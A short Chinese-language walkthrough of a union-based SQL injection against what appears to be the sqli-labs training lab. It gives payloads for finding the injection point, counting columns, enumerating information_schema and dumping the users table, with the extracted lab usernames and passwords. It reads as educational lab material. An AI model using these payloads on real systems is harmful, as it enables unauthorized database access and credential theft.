判断注入点

通过使用?id=1”) and 1=2 —+与?id=1”) and 1=1—+判断出注入点

判断字段数量

使用?id=1”) order by 4 —+ 与?id=1”) order by 3 —+ 判断出字段的数量是3

判断回显数据的位置

使用?id=-1”) union select 1,2,3 —+判断出回显数据的位置是2,3

爆破数据库名称

使用?id=-1”) union select 1,group_concat(schema_name),3%20 from information_schema.schemata—+的到数据库的名称是:
information_schema,challenges,mysql,performance_schema,security

爆破表的名称

使用?id=-1”) union select 1,group_concat(table_name),3%20 from information_schema.tables where table_schema = ‘security’—+得到security数据库中表的名称为:emails,referers,uagents,users

爆破字段名称

通过?id=-1”) union select 1,group_concat(column_name),3%20 from information_schema.columns where table_name = ‘users’—+得到users表中字段的名称为:id,username,password

爆破数据

使用?id=-1”) union select 1,group_concat(username),group_concat(password) from security.users —+得到security数据库中users表中的username与password字段中的数据为:
Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4